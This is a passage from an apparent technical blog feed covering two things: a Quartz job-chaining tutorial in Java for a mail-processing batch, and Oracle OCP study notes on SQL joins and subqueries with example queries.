minutes. The code which
was used for scheduling the job is given below:</p>
<pre><code>Trigger mailProcTrigger = TriggerUtils.makeMinutelyTrigger(5);
mailProcTrigger.setName(SchedulingConstants.MAILPROCESSOR_TRIGGER_NAME);
mailProcTrigger.setGroup(Scheduler.DEFAULT_GROUP);
JobDetail mailProc = new JobDetail(SchedulingConstants.MAILPROCESSOR_JOB_NAME, Scheduler.DEFAULT_GROUP, MailProcessor.class);
sched.scheduleJob(mailProc,mailProcTrigger);
logger.info("Mail Processor Scheduled");</code></pre>
<p>The following issues were faced with this kind of scheduling:</p>
<ol type="1">
<li>The SMTP server also has to handle online mailing at times, which
slows down the batch.</li>
<li>The number of records in the table is high, and hence the number of
mails to be sent is high.</li>
<li>For the above reasons, this job may take more than five minutes to
complete, which means that the next scheduled run of the same job
will be triggered before the first one completes.</li>
</ol>
<p><strong>Solution</strong></p>
<p>To resolve this, we need to chain the jobs such that the job
gets “re-scheduled” only after the previous run has completed. This is known
as “Job-Chaining”.</p>
<h3 id="job-chaining-how-it-was-implemented">Job Chaining – How it was
implemented</h3>
<ol type="1">
<li>A utility method that returns the time 5 minutes from now, and
another utility method that returns a SimpleTrigger using the
NextScheduledTime, are created.</li>
<li>The first scheduling of the job is done with a SimpleTrigger
(from the utility method), which starts the first job 5 minutes after the starting
instant.</li>
</ol>
<div class="sourceCode" id="cb4"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb4-1"><a aria-hidden="true" href="#cb4-1" tabindex="-1"></a> <span class="co">//The Utility method to return the Next Scheduling time 5 minutes from now</span></span>
<span id="cb4-2"><a aria-hidden="true" href="#cb4-2" tabindex="-1"></a> <span class="kw">public</span> <span class="dt">static</span> <span class="bu">Date</span> <span class="fu">getNextMailScheduledTime</span><span class="op">()</span> <span class="op">{</span></span>
<span id="cb4-3"><a aria-hidden="true" href="#cb4-3" tabindex="-1"></a> <span class="bu">Calendar</span> cal <span class="op">=</span> <span class="bu">Calendar</span><span class="op">.</span><span class="fu">getInstance</span><span class="op">();</span></span>
<span id="cb4-4"><a aria-hidden="true" href="#cb4-4" tabindex="-1"></a> <span class="bu">System</span><span class="op">.</span><span class="fu">out</span><span class="op">.</span><span class="fu">println</span><span class="op">(</span><span class="st">"Date Current: "</span><span class="op">+</span>cal<span class="op">.</span><span class="fu">getTimeInMillis</span><span class="op">());</span></span>
<span id="cb4-5"><a aria-hidden="true" href="#cb4-5" tabindex="-1"></a> cal<span class="op">.</span><span class="fu">add</span><span class="op">(</span><span class="bu">Calendar</span><span class="op">.</span><span class="fu">MINUTE</span><span class="op">,</span> <span class="dv">5</span><span class="op">);</span></span>
<span id="cb4-6"><a aria-hidden="true" href="#cb4-6" tabindex="-1"></a> <span class="bu">System</span><span class="op">.</span><span class="fu">out</span><span class="op">.</span><span class="fu">println</span><span class="op">(</span><span class="st">"Date after addition: "</span><span class="op">+</span>cal<span class="op">.</span><span class="fu">getTimeInMillis</span><span class="op">());</span></span>
<span id="cb4-7"><a aria-hidden="true" href="#cb4-7" tabindex="-1"></a> <span class="cf">return</span> cal<span class="op">.</span><span class="fu">getTime</span><span class="op">();</span></span>
<span id="cb4-8"><a aria-hidden="true" href="#cb4-8" tabindex="-1"></a> <span class="op">}</span></span>
<span id="cb4-9"><a aria-hidden="true" href="#cb4-9" tabindex="-1"></a></span>
<span id="cb4-10"><a aria-hidden="true" href="#cb4-10" tabindex="-1"></a> <span class="co">//The Utility Method to return a SimpleTrigger which uses the NextScheduledTime Utility Method for the Triggering time</span></span>
<span id="cb4-11"><a aria-hidden="true" href="#cb4-11" tabindex="-1"></a> <span class="kw">public</span> <span class="dt">static</span> Trigger <span class="fu">getMailProcessorTrigger</span><span class="op">()</span> <span class="op">{</span></span>
<span id="cb4-12"><a aria-hidden="true" href="#cb4-12" tabindex="-1"></a> <span class="bu">Date</span> newDate <span class="op">=</span> VsimsUtil<span class="op">.</span><span class="fu">getNextMailScheduledTime</span><span class="op">();</span></span>
<span id="cb4-13"><a aria-hidden="true" href="#cb4-13" tabindex="-1"></a> Trigger mailTrigger <span class="op">=</span> <span class="kw">new</span> <span class="fu">SimpleTrigger</span><span class="op">(</span>SchedulingConstants<span class="op">.</span><span class="fu">MAILPROCESSOR_TRIGGER_NAME</span><span class="op">,</span> Scheduler<span class="op">.</span><span class="fu">DEFAULT_GROUP</span><span class="op">,</span>newDate<span class="op">);</span></span>
<span id="cb4-14"><a aria-hidden="true" href="#cb4-14" tabindex="-1"></a> mailTrigger<span class="op">.</span><span class="fu">setJobName</span><span class="op">(</span>SchedulingConstants<span class="op">.</span><span class="fu">MAILPROCESSOR_JOB_NAME</span><span class="op">);</span></span>
<span id="cb4-15"><a aria-hidden="true" href="#cb4-15" tabindex="-1"></a> mailTrigger<span class="op">.</span><span class="fu">setJobGroup</span><span class="op">(</span>Scheduler<span class="op">.</span><span class="fu">DEFAULT_GROUP</span><span class="op">);</span></span>
<span id="cb4-16"><a aria-hidden="true" href="#cb4-16" tabindex="-1"></a> <span class="cf">return</span> mailTrigger<span class="op">;</span></span>
<span id="cb4-17"><a aria-hidden="true" href="#cb4-17" tabindex="-1"></a> <span class="op">}</span></span></code></pre></div>
<h3 id="scheduling-the-job-for-the-first-run">Scheduling the Job for the
First Run</h3>
<ol type="1">
<li><p>Using the utility methods, the “MailProcessor” job is scheduled to
run five minutes from the current instant.</p></li>
<li><p>Since a specific time instant is given for the trigger, this job
will be triggered only once.</p>
<pre><code>JobDetail mailJobDetail = new JobDetail("MailProcessorJob", Scheduler.DEFAULT_GROUP, MailProcessor.class);
sched.scheduleJob(mailJobDetail, VsimsUtil.getMailProcessorTrigger());
logger.info("Mail Processor Scheduled");</code></pre></li>
</ol>
<p>Note: <em>Since the job is being scheduled for the first time, we have
to use sched.scheduleJob() for scheduling the job.</em></p>
<p>In the execute method of the job, once the job is fired for the
first time by the trigger created above, the job execution steps are completed
and then the job gets “re-scheduled” to run five minutes later using the same
utility method.</p>
<div class="sourceCode" id="cb5"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb5-1"><a aria-hidden="true" href="#cb5-1" tabindex="-1"></a><span class="kw">public</span> <span class="dt">void</span> <span class="fu">execute</span><span class="op">(</span>JobExecutionContext jobContext<span class="op">)</span> <span class="kw">throws</span> JobExecutionException <span class="op">{</span></span>
<span id="cb5-2"><a aria-hidden="true" href="#cb5-2" tabindex="-1"></a> logger<span class="op">.</span><span class="fu">info</span><span class="op">(</span><span class="st">"MailProcessor execute - start"</span><span class="op">);</span></span>
<span id="cb5-3"><a aria-hidden="true" href="#cb5-3" tabindex="-1"></a></span>
<span id="cb5-4"><a aria-hidden="true" href="#cb5-4" tabindex="-1"></a> <span class="co">//PERFORM THE JOB EXECUTION STEPS HERE</span></span>
<span id="cb5-5"><a aria-hidden="true" href="#cb5-5" tabindex="-1"></a> <span class="co">//Chaining of the Job by re-scheduling</span></span>
<span id="cb5-6"><a aria-hidden="true" href="#cb5-6" tabindex="-1"></a> <span class="cf">try</span> <span class="op">{</span></span>
<span id="cb5-7"><a aria-hidden="true" href="#cb5-7" tabindex="-1"></a> logger<span class="op">.</span><span class="fu">info</span><span class="op">(</span><span class="st">"Scheduler Instance Id in Mail Processor: "</span></span>
<span id="cb5-8"><a aria-hidden="true" href="#cb5-8" tabindex="-1"></a> <span class="op">+</span> jobContext<span class="op">.</span><span class="fu">getScheduler</span><span class="op">().</span><span class="fu">getSchedulerInstanceId</span><span class="op">());</span></span>
<span id="cb5-9"><a aria-hidden="true" href="#cb5-9" tabindex="-1"></a></span>
<span id="cb5-10"><a aria-hidden="true" href="#cb5-10" tabindex="-1"></a> <span class="co">//If Rescheduled Correctly, the Scheduler returns the next Scheduled Time of the JOB</span></span>
<span id="cb5-11"><a aria-hidden="true" href="#cb5-11" tabindex="-1"></a> <span class="bu">Date</span> nextScheduledTime <span class="op">=</span> jobContext<span class="op">.</span><span class="fu">getScheduler</span><span class="op">().</span><span class="fu">rescheduleJob</span></span>
<span id="cb5-12"><a aria-hidden="true" href="#cb5-12" tabindex="-1"></a> <span class="op">(</span><span class="st">"MailProcessorJob"</span><span class="op">,</span> Scheduler<span class="op">.</span><span class="fu">DEFAULT_GROUP</span><span class="op">,</span> <span class="bu">Util</span><span class="op">.</span><span class="fu">getMailProcessorTrigger</span><span class="op">());</span></span>
<span id="cb5-13"><a aria-hidden="true" href="#cb5-13" tabindex="-1"></a> logger<span class="op">.</span><span class="fu">info</span><span class="op">(</span><span class="st">"Rescheduled at : "</span><span class="op">+</span>nextScheduledTime<span class="op">);</span></span>
<span id="cb5-14"><a aria-hidden="true" href="#cb5-14" tabindex="-1"></a> <span class="op">}</span> <span class="cf">catch</span> <span class="op">(</span>SchedulerException e<span class="op">)</span> <span class="op">{</span></span>
<span id="cb5-15"><a aria-hidden="true" href="#cb5-15" tabindex="-1"></a> logger<span class="op">.</span><span class="fu">error</span><span class="op">(</span><span class="st">"Error in Scheduling the Job for the Next Iteration"</span><span class="op">);</span></span>
<span id="cb5-16"><a aria-hidden="true" href="#cb5-16" tabindex="-1"></a> e<span class="op">.</span><span class="fu">printStackTrace</span><span class="op">();</span></span>
<span id="cb5-17"><a aria-hidden="true" href="#cb5-17" tabindex="-1"></a> <span class="op">}</span></span>
<span id="cb5-18"><a aria-hidden="true" href="#cb5-18" tabindex="-1"></a><span class="op">}</span></span></code></pre></div>
<p>Note: <em>Since the same job is being chained, we have to use
rescheduleJob().</em></p>
<p>The re-scheduling also uses the trigger returned by the
utility method, so each run schedules exactly one further run.
That run will in turn reschedule the job for its next
run once it completes. Thus we achieve chaining of the job runs.</p>
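<p>The chaining idea can also be sketched without Quartz. The following is
a minimal illustration, assuming a plain
<code>ScheduledExecutorService</code> from <code>java.util.concurrent</code>
in place of the Quartz scheduler; the class and method names
(<code>ChainedJobSketch</code>, <code>runChained</code>) are hypothetical and
the run count is bounded only so that the example terminates.</p>

```java
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.Executors;
import java.util.concurrent.ScheduledExecutorService;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.atomic.AtomicInteger;

public final class ChainedJobSketch {

    /**
     * Runs "work" the given number of times (runs >= 1). Each run is
     * scheduled only after the previous run has returned, so two runs
     * can never overlap. Returns the number of completed runs.
     */
    public static int runChained(Runnable work, int runs, long delayMillis) {
        ScheduledExecutorService scheduler = Executors.newSingleThreadScheduledExecutor();
        AtomicInteger completed = new AtomicInteger();
        CountDownLatch done = new CountDownLatch(1);

        Runnable chained = new Runnable() {
            @Override
            public void run() {
                try {
                    work.run(); // the job execution steps
                } finally {
                    // Chain: schedule the next run only now that this one is over.
                    if (completed.incrementAndGet() < runs) {
                        scheduler.schedule(this, delayMillis, TimeUnit.MILLISECONDS);
                    } else {
                        done.countDown();
                    }
                }
            }
        };

        // The first run is scheduled explicitly, like sched.scheduleJob() above.
        scheduler.schedule(chained, delayMillis, TimeUnit.MILLISECONDS);
        try {
            done.await();
        } catch (InterruptedException e) {
            Thread.currentThread().interrupt();
        } finally {
            scheduler.shutdown();
        }
        return completed.get();
    }

    public static void main(String[] args) {
        int n = runChained(() -> System.out.println("processing mail batch"), 3, 10);
        System.out.println("completed runs: " + n);
    }
}
```

<p>In this sketch the delay is measured from the end of one run to the start
of the next, which is the behaviour the chained Quartz job aims for.
<code>ScheduledExecutorService.scheduleWithFixedDelay</code> offers the same
semantics out of the box when Quartz is not a requirement.</p>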
<h3 id="references">References</h3>
<ul>
<li><a href="http://quartz.sourceforge.net/firstTutorial.html">Quartz</a></li>
<li><a href="http://www-128.ibm.com/developerworks/java/library/j-quartz/">IBM
Quartz</a></li>
</ul>Studying for OCP - Oracle Certifed Professional - Part 22009-02-20T00:00:00-08:002009-02-20T00:00:00-08:00Senthilkumar Gopaltag:sengopal.github.io,2009-02-20:/posts/studying-for-ocp-oracle-certifed-professional-part-2.htmlI am studying for the Oracle Certified Professional certification and following are notes which are specific to the certification, from the prep book. These notes are also helpful for a refresher on SQL syntax and usability.<p>I am studying for the Oracle Certified Professional certification and
following are notes which are specific to the certification, from the
prep book. These notes are also helpful for a refresher on SQL syntax
and usability.</p>
<p>Continued from <a href="studying-for-ocp-oracle-certifed-professional-part-1">Part
1</a></p>
<h3 id="chapter-7">Chapter 7</h3>
<ol type="1">
<li>equijoin - A row is associated with one or more rows in another
table based on the equality of column values or expressions.</li>
<li>nonequijoin - In this case, a row is associated with one or more
rows in another table if its column values fall into a range determined
by inequality operators.</li>
<li>Self-join: rows are associated with other rows in the same table,
typically to model a hierarchy.
<ul>
<li>Rows with null or differing entries in common join
columns are excluded when equijoins and nonequijoins are performed.</li>
<li>An outer join is available to fetch these one-legged or orphaned rows if
necessary.</li>
<li>A cross join or Cartesian product is formed when every row
from one table is joined to all rows in another, usually because of missing or
inadequate join conditions.</li>
</ul></li>
<li>When the source and target tables share identically named columns,
it is possible to perform a natural join between them without specifying
a join column. This is sometimes referred to as a pure natural join:
<code>select region_name from regions natural join countries where
country_name='Canada'</code></li>
<li><strong>JOIN…USING</strong>: <code>select region_name from regions join
countries using (region_id) where country_name='Canada'</code> -> brackets
are a part of the syntax</li>
<li><strong>JOIN…ON</strong> -> most widely used natural join format:
<code>select region_name from regions join countries on
(countries.region_id=regions.region_id) where country_name='Canada'</code>
-> brackets are optional</li>
<li>cross join or cartesian product .. This join creates one row of
output for every combination of source and target table rows.</li>
</ol>
<div class="sourceCode" id="cb1"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb1-1"><a aria-hidden="true" href="#cb1-1" tabindex="-1"></a><span class="kw">select</span> <span class="fu">count</span>(<span class="op">*</span>) <span class="kw">from</span> regions <span class="kw">cross</span> <span class="kw">join</span> countries;</span></code></pre></div>
<ol start="8" type="1">
<li>[TRADITIONAL JOIN SYNTAX] A plus symbol enclosed in brackets, (+), placed to
the left of the equal sign indicates to Oracle that a right outer
join must be performed -> (+) =</li>
<li>The join returns additional values from the table WITHOUT the (+)
symbol</li>
<li>CARTESIAN JOIN: <code>select * from regions,countries;</code></li>
<li>SQL:1999 Syntax</li>
</ol>
<div class="sourceCode" id="cb2"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb2-1"><a aria-hidden="true" href="#cb2-1" tabindex="-1"></a><span class="kw">SELECT</span> table1.<span class="kw">column</span>, table2.<span class="kw">column</span></span>
<span id="cb2-2"><a aria-hidden="true" href="#cb2-2" tabindex="-1"></a> <span class="kw">FROM</span> table1</span>
<span id="cb2-3"><a aria-hidden="true" href="#cb2-3" tabindex="-1"></a> [<span class="kw">NATURAL</span> <span class="kw">JOIN</span> table2] |</span>
<span id="cb2-4"><a aria-hidden="true" href="#cb2-4" tabindex="-1"></a> [<span class="kw">JOIN</span> table2 <span class="kw">USING</span> (column_name)] |</span>
<span id="cb2-5"><a aria-hidden="true" href="#cb2-5" tabindex="-1"></a> [<span class="kw">JOIN</span> table2 <span class="kw">ON</span> (table1.column_name <span class="op">=</span> table2.column_name)] |</span>
<span id="cb2-6"><a aria-hidden="true" href="#cb2-6" tabindex="-1"></a> [<span class="kw">LEFT</span> | <span class="kw">RIGHT</span> | <span class="kw">FULL</span> <span class="kw">OUTER</span> <span class="kw">JOIN</span> table2</span>
<span id="cb2-7"><a aria-hidden="true" href="#cb2-7" tabindex="-1"></a> <span class="kw">ON</span> (table1.column_name <span class="op">=</span> table2.column_name)] |</span>
<span id="cb2-8"><a aria-hidden="true" href="#cb2-8" tabindex="-1"></a> [<span class="kw">CROSS</span> <span class="kw">JOIN</span> table2];</span></code></pre></div>
<ol start="12" type="1">
<li>If no joins or fewer than N-1 joins are specified in the WHERE
clause conditions, where N refers to the number of tables in the query,
then a Cartesian or cross join is performed.</li>
<li>If an ambiguous column is NOT qualified with its table name or alias:
ORA-00918: column ambiguously defined</li>
<li>If a column used in JOIN…USING is qualified: ORA-25154: column part of
USING clause cannot have qualifier</li>
<li>Qualifying column references with dot notation to indicate a
column’s table of origin has a performance benefit. Time is saved
because Oracle is directed instantaneously to the appropriate table and
does not have to resolve the table name.</li>
<li>Natural JOIN</li>
</ol>
<div class="sourceCode" id="cb3"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb3-1"><a aria-hidden="true" href="#cb3-1" tabindex="-1"></a><span class="kw">SELECT</span> table1.<span class="kw">column</span>, table2.<span class="kw">column</span></span>
<span id="cb3-2"><a aria-hidden="true" href="#cb3-2" tabindex="-1"></a><span class="kw">FROM</span> table1</span>
<span id="cb3-3"><a aria-hidden="true" href="#cb3-3" tabindex="-1"></a><span class="kw">NATURAL</span> <span class="kw">JOIN</span> table2;</span></code></pre></div>
<ul>
<li>The pure natural join identifies the columns with common names in table1 and table2 and implicitly joins the tables using ALL THESE columns.</li>
<li>The columns in the SELECT clause may be qualified using dot notation unless they are one of the join columns.</li>
</ul>
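<p>How a pure natural join picks its join columns can be sketched in a few
lines. This is only an illustration of the rule, not of how Oracle resolves
columns internally; the class name <code>NaturalJoinColumnsSketch</code> is
hypothetical, the column lists are illustrative values modelled on the
tables used in these notes, and names are assumed to be already normalised
to upper case.</p>

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

public final class NaturalJoinColumnsSketch {

    /** Returns the column names shared by both tables, in left-table order. */
    public static List<String> joinColumns(List<String> leftColumns, List<String> rightColumns) {
        List<String> common = new ArrayList<>(leftColumns);
        common.retainAll(rightColumns); // keep only names that also exist on the right
        return common;
    }

    public static void main(String[] args) {
        List<String> regions = Arrays.asList("REGION_ID", "REGION_NAME");
        List<String> countries = Arrays.asList("COUNTRY_ID", "COUNTRY_NAME", "REGION_ID");
        List<String> jobs = Arrays.asList("JOB_ID", "JOB_TITLE");

        // One shared column: the natural join uses it implicitly.
        System.out.println(joinColumns(regions, countries)); // prints [REGION_ID]

        // No shared column: nothing to join on, so every row pairs with every row.
        System.out.println(joinColumns(regions, jobs).isEmpty()); // prints true
    }
}
```

<p>An empty result corresponds to the case where a natural join degenerates
into a Cartesian product.</p>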
<ol start="17" type="1">
<li>If NATURAL JOIN Column Names are of incompatible data types :
ORA-01722: invalid number</li>
<li>If there are no common name columns, NATURAL JOIN Performs a
CARTESIAN PRODUCT</li>
<li>JOIN…USING: <code>select EMP.last_name, EMP.Department_id, JH.end_date,
job_id, employee_id from job_history JH join employees EMP using
(job_id,employee_id)</code>
<ul>
<li>A column used in the USING clause must not be
qualified -> ORA-25154: column part of USING clause cannot have
qualifier</li>
<li>A column not used in the USING clause must be qualified if it is
ambiguously defined -> ORA-00918: column ambiguously defined</li>
</ul></li>
<li>The NATURAL keyword and USING (or) ON should not appear in the same
clause</li>
<li>When more than two tables are joined naturally, the interim result set
is joined to the third table; if the result set does not
have a common column with the third table, a Cartesian product
occurs</li>
<li>NON-EQUI JOINS</li>
</ol>
<div class="sourceCode" id="cb5"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb5-1"><a aria-hidden="true" href="#cb5-1" tabindex="-1"></a><span class="kw">SELECT</span> table1.<span class="kw">column</span>, table2.<span class="kw">column</span></span>
<span id="cb5-2"><a aria-hidden="true" href="#cb5-2" tabindex="-1"></a> <span class="kw">FROM</span> table1</span>
<span id="cb5-3"><a aria-hidden="true" href="#cb5-3" tabindex="-1"></a> [<span class="kw">JOIN</span> table2 <span class="kw">ON</span> (table1.column_name <span class="op"><</span> table2.column_name)]|</span>
<span id="cb5-4"><a aria-hidden="true" href="#cb5-4" tabindex="-1"></a> [<span class="kw">JOIN</span> table2 <span class="kw">ON</span> (table1.column_name <span class="op">></span> table2.column_name)]|</span>
<span id="cb5-5"><a aria-hidden="true" href="#cb5-5" tabindex="-1"></a> [<span class="kw">JOIN</span> table2 <span class="kw">ON</span> (table1.column_name <span class="op"><=</span> table2.column_name)]|</span>
<span id="cb5-6"><a aria-hidden="true" href="#cb5-6" tabindex="-1"></a> [<span class="kw">JOIN</span> table2 <span class="kw">ON</span> (table1.column_name <span class="op">>=</span> table2.column_name)]|</span>
<span id="cb5-7"><a aria-hidden="true" href="#cb5-7" tabindex="-1"></a> [<span class="kw">JOIN</span> table2 <span class="kw">ON</span> (table1.<span class="kw">column</span> <span class="kw">BETWEEN</span> table2.col1 <span class="kw">AND</span> table2.col2)]|</span></code></pre></div>
<ol start="23" type="1">
<li>A JOIN condition can combine predicates with the Boolean operators AND, OR and NOT ->
it needs to evaluate to a Boolean expression</li>
</ol>
<div class="sourceCode" id="cb6"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb6-1"><a aria-hidden="true" href="#cb6-1" tabindex="-1"></a><span class="kw">select</span> E.JOB_ID <span class="kw">from</span> Employees e <span class="kw">join</span> jobs j <span class="kw">on</span> (e.salary<span class="op">></span><span class="dv">5000</span> <span class="kw">and</span> <span class="dv">2</span><span class="op">*</span>e.salary <span class="op"><</span> j.max_salary);</span></code></pre></div>
<ol start="24" type="1">
<li>In addition to the matching rows, an outer join also returns unmatched rows:
<ul>
<li>LEFT outer join -> rows from the source table -> rows from the
LEFT of the JOIN condition: “X LEFT JOIN Y” -> rows from X</li>
<li>RIGHT outer join -> rows from the target table -> rows from the RIGHT of the
JOIN condition: “X RIGHT JOIN Y” -> rows from Y</li>
<li>FULL outer join -> both source and target tables</li>
</ul></li>
</ol>
<div class="sourceCode" id="cb7"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb7-1"><a aria-hidden="true" href="#cb7-1" tabindex="-1"></a><span class="kw">SELECT</span> table1.<span class="kw">column</span>, table2.<span class="kw">column</span></span>
<span id="cb7-2"><a aria-hidden="true" href="#cb7-2" tabindex="-1"></a> <span class="kw">FROM</span> table1</span>
<span id="cb7-3"><a aria-hidden="true" href="#cb7-3" tabindex="-1"></a> <span class="kw">LEFT</span> <span class="kw">OUTER</span> <span class="kw">JOIN</span> table2</span>
<span id="cb7-4"><a aria-hidden="true" href="#cb7-4" tabindex="-1"></a> <span class="kw">ON</span> (table1.<span class="kw">column</span> <span class="op">=</span> table2.<span class="kw">column</span>);</span>
<span id="cb7-5"><a aria-hidden="true" href="#cb7-5" tabindex="-1"></a><span class="kw">SELECT</span> table1.<span class="kw">column</span>, table2.<span class="kw">column</span></span>
<span id="cb7-6"><a aria-hidden="true" href="#cb7-6" tabindex="-1"></a> <span class="kw">FROM</span> table1</span>
<span id="cb7-7"><a aria-hidden="true" href="#cb7-7" tabindex="-1"></a> <span class="kw">RIGHT</span> <span class="kw">OUTER</span> <span class="kw">JOIN</span> table2</span>
<span id="cb7-8"><a aria-hidden="true" href="#cb7-8" tabindex="-1"></a> <span class="kw">ON</span> (table1.<span class="kw">column</span> <span class="op">=</span> table2.<span class="kw">column</span>);</span>
<span id="cb7-9"><a aria-hidden="true" href="#cb7-9" tabindex="-1"></a><span class="kw">SELECT</span> table1.<span class="kw">column</span>, table2.<span class="kw">column</span></span>
<span id="cb7-10"><a aria-hidden="true" href="#cb7-10" tabindex="-1"></a> <span class="kw">FROM</span> table1</span>
<span id="cb7-11"><a aria-hidden="true" href="#cb7-11" tabindex="-1"></a> <span class="kw">FULL</span> <span class="kw">OUTER</span> <span class="kw">JOIN</span> table2</span>
<span id="cb7-12"><a aria-hidden="true" href="#cb7-12" tabindex="-1"></a> <span class="kw">ON</span> (table1.<span class="kw">column</span> <span class="op">=</span> table2.<span class="kw">column</span>);</span>
<span id="cb7-13"><a aria-hidden="true" href="#cb7-13" tabindex="-1"></a><span class="kw">SELECT</span> table1.<span class="kw">column</span>, table2.<span class="kw">column</span></span>
<span id="cb7-14"><a aria-hidden="true" href="#cb7-14" tabindex="-1"></a> <span class="kw">FROM</span> table1</span>
<span id="cb7-15"><a aria-hidden="true" href="#cb7-15" tabindex="-1"></a> <span class="kw">CROSS</span> <span class="kw">JOIN</span> table2; <span class="co">-- ANSI SQL:1999 cross join syntax</span></span></code></pre></div>
<ol start="25" type="1">
<li><p>SQL*Plus presents any identically named columns as headings. SQL
Developer appends an underscore and number to each shared column name
and uses it as the heading</p></li>
<li><p>JOIN ON takes multiple conditions using AND -> SELECT * FROM
EMPLOYEES E JOIN DEPARTMENTS D ON E.DEPARTMENT_ID=D.DEPARTMENT_ID AND
E.MANAGER_ID=D.MANAGER_ID;</p></li>
<li><p>departments d outer join employees e -> INVALID SYNTAX ->
Need to specify type of OUTER join</p></li>
<li><p>CROSS JOIN cannot have a JOIN condition -> Syntax
Error</p></li>
<li><p><code>SELECT D.DEPARTMENT_ID FROM EMPLOYEES JOIN DEPARTMENTS D USING
(DEPARTMENT_ID);</code> -> fails with ORA-25154. Columns named in the USING clause must NOT
have qualifiers when they appear in the SELECT list.</p></li>
<li><p><code>SELECT * FROM LOCATIONS L RIGHT OUTER JOIN COUNTRIES C ON
(L.COUNTRY_ID=C.COUNTRY_ID) WHERE L.COUNTRY_ID is NULL</code></p>
<ul>
<li>The right outer join combines both tables and also returns the
rows in COUNTRIES that have no matching row in the LOCATIONS table.</li>
<li>The WHERE condition then removes the rows that have an entry in
the LOCATIONS table.</li>
<li>The result is the set of rows in the COUNTRIES
table without any entry in the LOCATIONS table.</li>
</ul></li>
<li><p>If there is an outer join, first join the tables and then apply the
WHERE conditions to get the results.</p></li>
</ol>
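<p>The outer join plus IS NULL pattern above can be tried out with a
small sketch. It uses Python's built-in <code>sqlite3</code> module as a
stand-in for Oracle, with made-up rows, and writes the join as COUNTRIES
LEFT OUTER JOIN LOCATIONS, which is the mirror image of the RIGHT OUTER
JOIN in the notes. Treat it as an illustration under those assumptions,
not as Oracle-specific behavior.</p>

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE countries (country_id TEXT PRIMARY KEY, country_name TEXT);
    CREATE TABLE locations (location_id INTEGER PRIMARY KEY, country_id TEXT, city TEXT);
    -- Hypothetical sample rows: Brazil has no location.
    INSERT INTO countries VALUES ('US', 'United States'), ('DE', 'Germany'), ('BR', 'Brazil');
    INSERT INTO locations VALUES (1, 'US', 'Seattle'), (2, 'DE', 'Munich');
""")

# The join runs first: COUNTRIES rows without a match come back with NULLs
# in the LOCATIONS columns. The WHERE clause then keeps only those rows.
unused_countries = [
    row[0]
    for row in conn.execute("""
        SELECT c.country_id
          FROM countries c
          LEFT OUTER JOIN locations l ON (l.country_id = c.country_id)
         WHERE l.country_id IS NULL
    """)
]
print(unused_countries)  # ['BR']
```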
<h3 id="chapter-8">Chapter 8</h3>
<ol type="1">
<li>A scalar subquery is a query that returns exactly one value: a
single row, with a single column.</li>
<li>A subquery is a query that is nested inside a SELECT, INSERT,
UPDATE, or DELETE statement or inside another subquery</li>
<li>Subqueries can be nested to an unlimited depth in a FROM clause but
to “only” 255 levels in a WHERE clause. They can be used in the SELECT
list and in the FROM, WHERE, and HAVING clauses of a query.</li>
<li>Using NOT IN is fraught with problems because of the way SQL handles
NULLs. As a general rule, do not use NOT IN unless you are certain that
the result set will not include a NULL.</li>
<li>If the subquery is going to return more than one row, then the
comparison operator must be able to accept multiple values. These
operators are IN, NOT IN, ANY, and ALL. If the comparison operator is
EQUAL, GREATER THAN, or LESS THAN (which each can only accept one
value), the parent query will fail.</li>
<li>An extension of the use of subqueries as an alternative to a join is
to enable the star transformation often needed in data warehouse
applications</li>
</ol>
<div class="sourceCode" id="cb8"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb8-1"><a aria-hidden="true" href="#cb8-1" tabindex="-1"></a><span class="co">-- FROM a join query:</span></span>
<span id="cb8-2"><a aria-hidden="true" href="#cb8-2" tabindex="-1"></a><span class="kw">select</span> <span class="op">..</span>. <span class="kw">from</span> sales s, products p, buyers b, channels c</span>
<span id="cb8-3"><a aria-hidden="true" href="#cb8-3" tabindex="-1"></a><span class="kw">where</span> s.prod_code<span class="op">=</span>p.prod_code</span>
<span id="cb8-4"><a aria-hidden="true" href="#cb8-4" tabindex="-1"></a><span class="kw">and</span> s.buy_code<span class="op">=</span>b.buy_code</span>
<span id="cb8-5"><a aria-hidden="true" href="#cb8-5" tabindex="-1"></a><span class="kw">and</span> s.chan_code<span class="op">=</span>c.chan_code</span>
<span id="cb8-6"><a aria-hidden="true" href="#cb8-6" tabindex="-1"></a><span class="kw">and</span> p.product<span class="op">=</span><span class="st">'Books'</span></span>
<span id="cb8-7"><a aria-hidden="true" href="#cb8-7" tabindex="-1"></a><span class="kw">and</span> b.country<span class="op">=</span><span class="st">'Germany'</span></span>
<span id="cb8-8"><a aria-hidden="true" href="#cb8-8" tabindex="-1"></a><span class="kw">and</span> c.channel<span class="op">=</span><span class="st">'Internet'</span>;</span>
<span id="cb8-9"><a aria-hidden="true" href="#cb8-9" tabindex="-1"></a></span>
<span id="cb8-10"><a aria-hidden="true" href="#cb8-10" tabindex="-1"></a><span class="co">-- TO the subquery form:</span></span>
<span id="cb8-11"><a aria-hidden="true" href="#cb8-11" tabindex="-1"></a><span class="kw">select</span> <span class="op">..</span>. <span class="kw">from</span> sales</span>
<span id="cb8-12"><a aria-hidden="true" href="#cb8-12" tabindex="-1"></a><span class="kw">where</span> prod_code <span class="kw">in</span> (<span class="kw">select</span> prod_code <span class="kw">from</span> products <span class="kw">where</span> product<span class="op">=</span><span class="st">'Books'</span>)</span>
<span id="cb8-13"><a aria-hidden="true" href="#cb8-13" tabindex="-1"></a><span class="kw">and</span> buy_code <span class="kw">in</span> (<span class="kw">select</span> buy_code <span class="kw">from</span> buyers <span class="kw">where</span> country<span class="op">=</span><span class="st">'Germany'</span>)</span>
<span id="cb8-14"><a aria-hidden="true" href="#cb8-14" tabindex="-1"></a><span class="kw">and</span> chan_code <span class="kw">in</span> (<span class="kw">select</span> chan_code <span class="kw">from</span> channels <span class="kw">where</span> channel<span class="op">=</span><span class="st">'Internet'</span>);</span></code></pre></div>
<ol start="7" type="1">
<li>Star transformation: the instance initialization parameter
